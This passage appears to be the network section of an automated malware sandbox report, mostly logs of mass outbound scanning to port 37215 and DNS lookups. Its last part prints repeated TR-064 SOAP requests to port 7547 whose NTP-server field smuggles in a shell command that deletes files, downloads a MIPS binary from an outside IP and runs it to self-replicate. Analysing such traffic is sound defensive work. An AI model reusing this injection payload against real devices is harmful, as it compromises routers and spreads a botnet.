                                          Nov 7, 2024 11:58:01.419349909 CET3070437215192.168.2.13157.97.75.97
                                          Nov 7, 2024 11:58:01.419351101 CET3070437215192.168.2.13157.52.139.212
                                          Nov 7, 2024 11:58:01.419353008 CET3070437215192.168.2.13157.120.242.173
                                          Nov 7, 2024 11:58:01.419353008 CET3070437215192.168.2.13157.121.156.10
                                          Nov 7, 2024 11:58:01.419364929 CET3070437215192.168.2.13157.127.55.83
                                          Nov 7, 2024 11:58:01.419368029 CET3070437215192.168.2.13157.11.210.223
                                          Nov 7, 2024 11:58:01.419375896 CET3070437215192.168.2.13157.179.149.49
                                          Nov 7, 2024 11:58:01.419394970 CET3070437215192.168.2.13157.133.105.69
                                          Nov 7, 2024 11:58:01.419405937 CET3070437215192.168.2.13157.13.177.223
                                          Nov 7, 2024 11:58:01.419409037 CET3070437215192.168.2.13157.222.139.180
                                          Nov 7, 2024 11:58:01.419420004 CET3070437215192.168.2.13157.234.111.137
                                          Nov 7, 2024 11:58:01.419420004 CET3070437215192.168.2.13157.148.249.68
                                          Nov 7, 2024 11:58:01.419430017 CET3070437215192.168.2.13157.15.94.16
                                          Nov 7, 2024 11:58:01.419435978 CET3070437215192.168.2.13157.243.2.43
                                          Nov 7, 2024 11:58:01.419437885 CET3070437215192.168.2.13157.200.93.146
                                          Nov 7, 2024 11:58:01.419450998 CET3070437215192.168.2.13157.246.20.108
                                          Nov 7, 2024 11:58:01.419460058 CET3070437215192.168.2.13157.14.254.157
                                          Nov 7, 2024 11:58:01.419460058 CET3070437215192.168.2.13157.104.206.109
                                          Nov 7, 2024 11:58:01.419461966 CET3070437215192.168.2.13157.158.57.23
                                          Nov 7, 2024 11:58:01.419461966 CET3070437215192.168.2.13157.134.167.134
                                          Nov 7, 2024 11:58:01.419464111 CET3070437215192.168.2.13157.181.93.52
                                          Nov 7, 2024 11:58:01.419472933 CET3070437215192.168.2.13157.9.35.87
                                          Nov 7, 2024 11:58:01.419475079 CET3070437215192.168.2.13157.65.182.136
                                          Nov 7, 2024 11:58:01.419475079 CET3070437215192.168.2.13157.50.204.192
                                          Nov 7, 2024 11:58:01.419487953 CET3070437215192.168.2.13157.215.180.208
                                          Nov 7, 2024 11:58:01.419496059 CET3070437215192.168.2.13157.98.145.142
                                          Nov 7, 2024 11:58:01.419517994 CET3070437215192.168.2.13157.169.155.98
                                          Nov 7, 2024 11:58:01.419519901 CET3070437215192.168.2.13157.115.144.114
                                          Nov 7, 2024 11:58:01.419522047 CET3070437215192.168.2.13157.19.166.247
                                          Nov 7, 2024 11:58:01.419522047 CET3070437215192.168.2.13157.84.4.118
                                          Nov 7, 2024 11:58:01.419523954 CET3070437215192.168.2.13157.231.193.231
                                          Nov 7, 2024 11:58:01.419529915 CET3070437215192.168.2.13157.4.138.255
                                          Nov 7, 2024 11:58:01.419543028 CET3070437215192.168.2.13157.243.245.70
                                          Nov 7, 2024 11:58:01.419548035 CET3070437215192.168.2.13157.167.223.165
                                          Nov 7, 2024 11:58:01.419553041 CET3070437215192.168.2.13157.3.121.30
                                          Nov 7, 2024 11:58:01.419553041 CET3070437215192.168.2.13157.45.78.37
                                          Nov 7, 2024 11:58:01.419555902 CET4996680192.168.2.13112.10.98.127
                                          Nov 7, 2024 11:58:01.419557095 CET3070437215192.168.2.13157.126.230.222
                                          Nov 7, 2024 11:58:01.419557095 CET3070437215192.168.2.13157.251.153.18
                                          Nov 7, 2024 11:58:01.419564009 CET3070437215192.168.2.13157.232.135.217
                                          Nov 7, 2024 11:58:01.419575930 CET3070437215192.168.2.13157.18.175.105
                                          Nov 7, 2024 11:58:01.419576883 CET3070437215192.168.2.13157.119.182.205
                                          Nov 7, 2024 11:58:01.419579029 CET3070437215192.168.2.13157.38.204.126
                                          Nov 7, 2024 11:58:01.419584036 CET3070437215192.168.2.13157.72.100.13
                                          Nov 7, 2024 11:58:01.419589996 CET3070437215192.168.2.13157.241.244.93
                                          Nov 7, 2024 11:58:01.419606924 CET3070437215192.168.2.13157.189.169.34
                                          Nov 7, 2024 11:58:01.419606924 CET3070437215192.168.2.13157.162.235.183
                                          Nov 7, 2024 11:58:01.419608116 CET3070437215192.168.2.13157.92.251.215
                                          Nov 7, 2024 11:58:01.419620991 CET3070437215192.168.2.13157.40.242.167
                                          Nov 7, 2024 11:58:01.419626951 CET3070437215192.168.2.13157.214.85.15
                                          Nov 7, 2024 11:58:01.419627905 CET3070437215192.168.2.13157.109.65.152
                                          Nov 7, 2024 11:58:01.419626951 CET3070437215192.168.2.13157.23.135.10
                                          Nov 7, 2024 11:58:01.419626951 CET3070437215192.168.2.13157.199.76.0
                                          Nov 7, 2024 11:58:01.419626951 CET3070437215192.168.2.13157.222.216.171
                                          Nov 7, 2024 11:58:01.419626951 CET3070437215192.168.2.13157.225.142.206
                                          Nov 7, 2024 11:58:01.419645071 CET3070437215192.168.2.13157.16.103.64
                                          Nov 7, 2024 11:58:01.419645071 CET3070437215192.168.2.13157.99.214.78
                                          Nov 7, 2024 11:58:01.419647932 CET3070437215192.168.2.13157.92.210.55
                                          Nov 7, 2024 11:58:01.419660091 CET3070437215192.168.2.13157.96.219.0
                                          Nov 7, 2024 11:58:01.419663906 CET3070437215192.168.2.13157.194.192.66
                                          Nov 7, 2024 11:58:01.419666052 CET3070437215192.168.2.13157.98.30.118
                                          Nov 7, 2024 11:58:01.419682026 CET3070437215192.168.2.13157.30.114.33
                                          Nov 7, 2024 11:58:01.419682026 CET3070437215192.168.2.13157.93.7.206
                                          Nov 7, 2024 11:58:01.419689894 CET3070437215192.168.2.13157.30.46.198
                                          Nov 7, 2024 11:58:01.419692039 CET3070437215192.168.2.13157.199.68.51
                                          Nov 7, 2024 11:58:01.419698000 CET3070437215192.168.2.13157.150.164.213
                                          Nov 7, 2024 11:58:01.419704914 CET3070437215192.168.2.13157.206.152.250
                                          Nov 7, 2024 11:58:01.419724941 CET3070437215192.168.2.13157.153.153.209
                                          Nov 7, 2024 11:58:01.419724941 CET3070437215192.168.2.13157.4.213.116
                                          Nov 7, 2024 11:58:01.419725895 CET3070437215192.168.2.13157.129.153.171
                                          Nov 7, 2024 11:58:01.419729948 CET3070437215192.168.2.13157.101.189.238
                                          Nov 7, 2024 11:58:01.419747114 CET3070437215192.168.2.13157.53.203.82
                                          Nov 7, 2024 11:58:01.419761896 CET3070437215192.168.2.13157.120.108.181
                                          Nov 7, 2024 11:58:01.419770002 CET3070437215192.168.2.13157.128.167.144
                                          Nov 7, 2024 11:58:01.419771910 CET3070437215192.168.2.13157.189.201.232
                                          Nov 7, 2024 11:58:01.419771910 CET3070437215192.168.2.13157.109.243.126
                                          Nov 7, 2024 11:58:01.419774055 CET3070437215192.168.2.13157.191.117.241
                                          Nov 7, 2024 11:58:01.419785023 CET3070437215192.168.2.13157.136.206.27
                                          Nov 7, 2024 11:58:01.419789076 CET3070437215192.168.2.13157.151.35.62
                                          Nov 7, 2024 11:58:01.419804096 CET3070437215192.168.2.13157.235.140.14
                                          Nov 7, 2024 11:58:01.419804096 CET3070437215192.168.2.13157.159.245.164
                                          Nov 7, 2024 11:58:01.419806957 CET3070437215192.168.2.13157.89.253.253
                                          Nov 7, 2024 11:58:01.419807911 CET3070437215192.168.2.13157.96.113.34
                                          Nov 7, 2024 11:58:01.419817924 CET3070437215192.168.2.13157.225.89.90
                                          Nov 7, 2024 11:58:01.419819117 CET3070437215192.168.2.13157.210.236.85
                                          Nov 7, 2024 11:58:01.419819117 CET3070437215192.168.2.13157.160.31.127
                                          Nov 7, 2024 11:58:01.419821978 CET3070437215192.168.2.13157.65.205.235
                                          Nov 7, 2024 11:58:01.419835091 CET3070437215192.168.2.13157.0.75.84
                                          Nov 7, 2024 11:58:01.419840097 CET3070437215192.168.2.13157.243.154.124
                                          Nov 7, 2024 11:58:01.419843912 CET3070437215192.168.2.13157.224.215.215
                                          Nov 7, 2024 11:58:01.419857979 CET3070437215192.168.2.13157.46.78.206
                                          Nov 7, 2024 11:58:01.419857979 CET3070437215192.168.2.13157.197.132.117
                                          Nov 7, 2024 11:58:01.419861078 CET3070437215192.168.2.13157.58.239.59
                                          Nov 7, 2024 11:58:01.419871092 CET3070437215192.168.2.13157.253.144.129
                                          Nov 7, 2024 11:58:01.419883013 CET3070437215192.168.2.13157.212.116.244
                                          Nov 7, 2024 11:58:01.419893026 CET3070437215192.168.2.13157.34.158.206
                                          Nov 7, 2024 11:58:01.419893026 CET3070437215192.168.2.13157.216.49.49
                                          Nov 7, 2024 11:58:01.419908047 CET3070437215192.168.2.13157.91.97.23
                                          Nov 7, 2024 11:58:01.419908047 CET3070437215192.168.2.13157.107.109.38
                                          Nov 7, 2024 11:58:01.419917107 CET3070437215192.168.2.13157.20.211.152
                                          Nov 7, 2024 11:58:01.419918060 CET3070437215192.168.2.13157.194.245.215
                                          Nov 7, 2024 11:58:01.419919014 CET3070437215192.168.2.13157.23.52.254
                                          Nov 7, 2024 11:58:01.419918060 CET3070437215192.168.2.13157.46.35.183
                                          Nov 7, 2024 11:58:01.419918060 CET3070437215192.168.2.13157.58.31.96
                                          Nov 7, 2024 11:58:01.419918060 CET3070437215192.168.2.13157.99.20.21
                                          Nov 7, 2024 11:58:01.419924021 CET3070437215192.168.2.13157.179.8.121
                                          Nov 7, 2024 11:58:01.419924021 CET3070437215192.168.2.13157.219.31.140
                                          Nov 7, 2024 11:58:01.419931889 CET3070437215192.168.2.13157.38.113.107
                                          Nov 7, 2024 11:58:01.419944048 CET3070437215192.168.2.13157.30.143.214
                                          Nov 7, 2024 11:58:01.419951916 CET3070437215192.168.2.13157.59.150.12
                                          Nov 7, 2024 11:58:01.419960022 CET3070437215192.168.2.13157.233.193.250
                                          Nov 7, 2024 11:58:01.419972897 CET3070437215192.168.2.13157.162.4.240
                                          Nov 7, 2024 11:58:01.419977903 CET3070437215192.168.2.13157.95.159.7
                                          Nov 7, 2024 11:58:01.419980049 CET3070437215192.168.2.13157.139.172.224
                                          Nov 7, 2024 11:58:01.419985056 CET3070437215192.168.2.13157.85.37.213
                                          Nov 7, 2024 11:58:01.419985056 CET3070437215192.168.2.13157.252.29.236
                                          Nov 7, 2024 11:58:01.419987917 CET3070437215192.168.2.13157.67.48.52
                                          Nov 7, 2024 11:58:01.420001984 CET3070437215192.168.2.13157.61.223.224
                                          Nov 7, 2024 11:58:01.420001984 CET3070437215192.168.2.13157.242.170.61
                                          Nov 7, 2024 11:58:01.420012951 CET3070437215192.168.2.13157.213.132.163
                                          Nov 7, 2024 11:58:01.420026064 CET3070437215192.168.2.13157.86.23.139
                                          Nov 7, 2024 11:58:01.420025110 CET3070437215192.168.2.13157.27.33.38
                                          Nov 7, 2024 11:58:01.420030117 CET3070437215192.168.2.13157.59.208.170
                                          Nov 7, 2024 11:58:01.420032024 CET3070437215192.168.2.13157.100.19.247
                                          Nov 7, 2024 11:58:01.420032024 CET3070437215192.168.2.13157.104.25.106
                                          Nov 7, 2024 11:58:01.420032024 CET3070437215192.168.2.13157.164.227.60
                                          Nov 7, 2024 11:58:01.420032024 CET3070437215192.168.2.13157.49.159.90
                                          Nov 7, 2024 11:58:01.420037031 CET3070437215192.168.2.13157.150.30.251
                                          Nov 7, 2024 11:58:01.420048952 CET3070437215192.168.2.13157.31.40.102
                                          Nov 7, 2024 11:58:01.420053005 CET3070437215192.168.2.13157.52.209.125
                                          Nov 7, 2024 11:58:01.420061111 CET3070437215192.168.2.13157.170.40.85
                                          Nov 7, 2024 11:58:01.420061111 CET3070437215192.168.2.13157.182.49.93
                                          Nov 7, 2024 11:58:01.420061111 CET3070437215192.168.2.13157.225.172.21
                                          Nov 7, 2024 11:58:01.420063972 CET3070437215192.168.2.13157.175.46.12
                                          Nov 7, 2024 11:58:01.420069933 CET3070437215192.168.2.13157.191.247.209
                                          Nov 7, 2024 11:58:01.420077085 CET3070437215192.168.2.13157.28.18.202
                                          Nov 7, 2024 11:58:01.420078993 CET3070437215192.168.2.13157.65.218.119
                                          Nov 7, 2024 11:58:01.420078993 CET3070437215192.168.2.13157.143.101.163
                                          Nov 7, 2024 11:58:01.420078993 CET3070437215192.168.2.13157.60.64.136
                                          Nov 7, 2024 11:58:01.420084953 CET3070437215192.168.2.13157.204.126.133
                                          Nov 7, 2024 11:58:01.420094013 CET3070437215192.168.2.13157.213.90.179
                                          Nov 7, 2024 11:58:01.420100927 CET3070437215192.168.2.13157.67.102.164
                                          Nov 7, 2024 11:58:01.420114040 CET3070437215192.168.2.13157.155.136.161
                                          Nov 7, 2024 11:58:01.420115948 CET3070437215192.168.2.13157.173.124.77
                                          Nov 7, 2024 11:58:01.420123100 CET3070437215192.168.2.13157.57.191.159
                                          Nov 7, 2024 11:58:01.420126915 CET3070437215192.168.2.13157.123.93.122
                                          Nov 7, 2024 11:58:01.420139074 CET3070437215192.168.2.13157.56.137.137
                                          Nov 7, 2024 11:58:01.420146942 CET3070437215192.168.2.13157.248.217.186
                                          Nov 7, 2024 11:58:01.420161009 CET3070437215192.168.2.13157.110.122.73
                                          Nov 7, 2024 11:58:01.420175076 CET3070437215192.168.2.13157.62.218.196
                                          Nov 7, 2024 11:58:01.420175076 CET3070437215192.168.2.13157.13.159.192
                                          Nov 7, 2024 11:58:01.420181036 CET3070437215192.168.2.13157.31.178.150
                                          Nov 7, 2024 11:58:01.420187950 CET3070437215192.168.2.13157.19.19.89
                                          Nov 7, 2024 11:58:01.420197964 CET3070437215192.168.2.13157.99.123.20
                                          Nov 7, 2024 11:58:01.420198917 CET3070437215192.168.2.13157.40.139.206
                                          Nov 7, 2024 11:58:01.420202971 CET3070437215192.168.2.13157.202.64.158
                                          Nov 7, 2024 11:58:01.420202971 CET3070437215192.168.2.13157.168.81.208
                                          Nov 7, 2024 11:58:01.420202971 CET3070437215192.168.2.13157.120.164.125
                                          Nov 7, 2024 11:58:01.420203924 CET3070437215192.168.2.13157.160.102.245
                                          Nov 7, 2024 11:58:01.420212030 CET3070437215192.168.2.13157.252.254.129
                                          Nov 7, 2024 11:58:01.420212984 CET3070437215192.168.2.13157.109.121.211
                                          Nov 7, 2024 11:58:01.420216084 CET3070437215192.168.2.13157.3.43.165
                                          Nov 7, 2024 11:58:01.420216084 CET3070437215192.168.2.13157.133.220.143
                                          Nov 7, 2024 11:58:01.420219898 CET3070437215192.168.2.13157.151.226.43
                                          Nov 7, 2024 11:58:01.420224905 CET3070437215192.168.2.13157.138.225.236
                                          Nov 7, 2024 11:58:01.420229912 CET3070437215192.168.2.13157.137.214.254
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Nov 7, 2024 12:00:42.806426048 CET192.168.2.131.1.1.10xd49eStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                          Nov 7, 2024 12:00:42.806473970 CET192.168.2.131.1.1.10x5c56Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                          Nov 7, 2024 12:00:47.810174942 CET192.168.2.138.8.8.80x5c56Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Nov 7, 2024 12:00:42.813921928 CET1.1.1.1192.168.2.130xd49eNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                          Nov 7, 2024 12:00:42.813921928 CET1.1.1.1192.168.2.130xd49eNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                          Session IDSource IPSource PortDestination IPDestination Port
                                          0192.168.2.1359598168.30.180.557547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.744966030 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1192.168.2.1355804198.219.183.557547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.746006012 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2192.168.2.1337300165.239.16.1487547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.747034073 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3192.168.2.1336156203.84.99.537547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.748120070 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4192.168.2.135925045.38.44.17547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.749089956 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5192.168.2.1353228173.66.213.277547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.750176907 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6192.168.2.1337966178.51.106.2377547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.751390934 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7192.168.2.135152695.178.151.1097547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.752525091 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8192.168.2.13520304.230.209.1337547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.753463984 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9192.168.2.1345154201.250.120.247547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.754573107 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10192.168.2.1336226217.144.32.437547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.755553961 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11192.168.2.135971634.183.63.817547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:57:59.756599903 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
